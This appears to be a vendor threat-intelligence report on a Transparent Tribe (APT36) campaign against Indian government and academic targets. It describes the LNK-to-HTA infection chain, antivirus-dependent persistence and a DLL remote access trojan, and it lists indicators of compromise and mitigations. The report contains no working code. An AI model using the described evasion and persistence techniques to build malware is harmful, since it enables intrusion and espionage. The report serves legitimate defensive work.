Executive Summary

Transparent Tribe (also known as APT36), a persistent and highly adaptive state-sponsored threat actor, has initiated a sophisticated campaign targeting Indian government and academic institutions with new Remote Access Trojan (RAT) attacks. This campaign is characterized by the use of advanced spear-phishing techniques, weaponized Windows shortcut (LNK) files, and custom malware payloads designed for stealth, persistence, and data exfiltration. The attackers employ multi-stage infection chains, environment-aware persistence mechanisms, and legitimate decoy documents to evade detection and maximize operational success. The campaign demonstrates a significant escalation in both technical sophistication and targeting precision, posing a critical threat to sensitive governmental and academic data.

Threat Actor Profile

Transparent Tribe (APT36) is a well-documented advanced persistent threat group, widely attributed to state-sponsored interests in South Asia, particularly Pakistan. The group has a long history of targeting Indian government, military, and educational sectors, as well as diplomatic and defense organizations. Transparent Tribe is known for its rapid adaptation to security controls, leveraging custom malware, open-source tools, and social engineering to achieve its objectives. The group’s operational toolkit includes a variety of RATs, credential stealers, and reconnaissance utilities, with a focus on long-term espionage and data theft. Their campaigns are marked by the use of highly convincing phishing lures, often mimicking official advisories or academic communications, and a deep understanding of the targeted environment’s security posture.

Technical Analysis of Malware/TTPs

The latest campaign by Transparent Tribe employs a multi-stage infection chain, beginning with spear-phishing emails that deliver ZIP archives containing LNK files masquerading as PDF documents. When a victim opens the LNK file, it executes a remote HTML Application (HTA) script via mshta.exe, a legitimate Windows binary often abused for living-off-the-land attacks. The HTA script is obfuscated and environment-aware, using ActiveX objects such as WScript.Shell to profile the host and determine the installed antivirus solution.

Based on the detected security software, the malware dynamically selects its persistence mechanism. For example, if Kaspersky is present, the malware creates a directory at C:\Users\Public\core\, writes an obfuscated HTA payload, and drops a LNK file in the Startup folder to ensure execution via mshta.exe on reboot. For Quick Heal, it creates a batch file and a LNK in Startup, launching the payload through the batch script. If Avast, AVG, or Avira are detected, the payload is copied directly to the Startup folder and executed. In environments with no recognized antivirus, the malware employs batch file execution, registry-based persistence, and direct payload deployment.

The second-stage payload is a custom DLL (commonly named iinneldc.dll), which functions as a full-featured RAT. This malware provides the attacker with remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control capabilities. The RAT communicates with its command-and-control (C2) infrastructure using HTTP GET requests, with endpoint strings stored in reverse within the binary to evade signature-based detection. Notable C2 domains include dns.wmiprovider[.]com and aeroclubofindia.co[.]in, both of which have been observed in recent campaigns.

A particularly notable campaign variant, NCERT-Whatsapp-Advisory.pdf.lnk, delivers a .NET-based loader that drops additional executables and malicious DLLs for remote command execution and reconnaissance. This loader downloads an MSI installer (nikmights.msi) from the attacker-controlled domain and establishes persistence via registry modifications and file drops to C:\ProgramData\PcDirvs\.

Throughout the infection process, the malware displays legitimate decoy documents—often advisories from trusted organizations such as PKCERT—to the victim, reducing suspicion and increasing the likelihood of successful compromise.

Exploitation in the Wild

The campaign has been observed actively targeting Indian government agencies, academic institutions, and strategic organizations since late 2025. Attackers leverage spear-phishing emails crafted to appear as official communications, often referencing current events or advisories relevant to the target sector. The use of legitimate-looking decoy documents and adaptive persistence mechanisms has enabled Transparent Tribe to bypass traditional endpoint security solutions and maintain long-term access to compromised systems.

Infection telemetry indicates that the attackers are highly selective, focusing on entities with access to sensitive information or critical infrastructure. The campaign’s infrastructure, including C2 domains and payload delivery servers, has been registered and maintained with operational security in mind, often rotating domains and employing obfuscation techniques to hinder detection and takedown efforts.

Victimology and Targeting

The primary victims of this campaign are Indian government ministries, defense contractors, research institutions, and universities. The attackers demonstrate a nuanced understanding of the internal workflows and communication patterns within these organizations, tailoring phishing lures to maximize credibility and engagement. Secondary targeting includes individuals and organizations in Pakistan, often as part of decoy or misdirection efforts.

Victimology analysis reveals that the attackers prioritize entities involved in policy-making, defense research, and academic collaboration, seeking to exfiltrate sensitive documents, credentials, and intellectual property. The campaign’s focus on academia suggests an interest in both research data and the potential for lateral movement into more sensitive government networks.

Mitigation and Countermeasures

Organizations are strongly advised to implement a multi-layered defense strategy to mitigate the risk posed by Transparent Tribe and similar threat actors. Key recommendations include:

Continuous monitoring for the provided indicators of compromise (IOCs), including suspicious file paths such as C:\Users\Public\core\, C:\ProgramData\PcDirvs\pdf.dll, and C:\Users\Public\core\iinneldc.dll, as well as the presence of malicious files like NCERT-Whatsapp-Advisory.pdf.lnk and nikmights.msi. Network security teams should block and investigate any connections to known C2 domains, including dns.wmiprovider[.]com and aeroclubofindia.co[.]in. Endpoint protection solutions must be configured to detect and quarantine LNK and HTA files, especially those masquerading as PDF documents. Regular audits of registry and Startup folder entries are essential to identify unauthorized persistence mechanisms. User awareness training should be conducted to educate staff on the risks of spear-phishing and document-based malware delivery, emphasizing the importance of verifying the authenticity of unexpected attachments or links.

Advanced threat detection solutions, such as behavioral analytics and memory forensics, can provide additional layers of defense against in-memory payload execution and obfuscated malware. Organizations should also consider implementing application whitelisting to restrict the execution of unauthorized scripts and binaries, particularly mshta.exe and cmd.exe.

References

The Hacker News: Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia

CYFIRMA Technical Report: CYFIRMA

Sekoia: DeskRAT Campaign

BlackBerry: Transparent Tribe Targeting Indian Government

MITRE ATT&CK: APT36 Profile

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their extended supply chain. Our advanced threat intelligence and risk analytics empower security teams to proactively identify and address emerging threats, ensuring robust protection for critical assets and data. For more information or to discuss how Rescana can support your organization’s cybersecurity posture, please contact us at ops@rescana.com.